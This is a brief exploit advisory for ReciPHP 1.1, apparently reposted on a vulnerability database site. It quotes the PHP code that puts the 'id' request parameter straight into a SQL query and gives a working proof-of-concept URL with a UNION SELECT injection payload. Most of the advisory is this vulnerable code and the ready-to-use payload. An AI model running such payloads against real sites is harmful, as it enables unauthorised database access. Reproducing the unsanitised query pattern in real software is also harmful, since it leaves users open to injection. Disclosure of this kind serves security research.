\#'#/ (-.-) --------------------oOO---(_)---OOo---------------------- | ReciPHP 1.1 SQL Injection Vulnerability | --------------------------------------------------------- [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Site: http://0xuht.org [!] Download: http://sourceforge.net/projects/reciphp/files/ [!] Version: 1.1 [!] Date: 14.11.2012 [!] Remote: yes [!] Tested: Ubuntu [!] Reference: http://0xuht.org/Exploit/reciphp.txt [!] Vulnerability Code [showrecipe.inc.php] : <?php include 'config.php'; ?> <div id="main"> <div id='preview'><?php $recipeid = $_GET['id']; $query = "SELECT title,poster,shortdesc,ingredients,directions from recipes where recipeid = $recipeid"; $result = mysql_query($query) or die('Could not find recipe'); [!] PoC (Piye om Carane): [ReciPHP]/index.php?content=showrecipe&id=-3 union select version(),2,3,4,5-- [!] Demo: http://0xuht.org/demo/reciphp.png [!] Thanks: packetstormsecurity // Gorontalo [2012-11-14]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论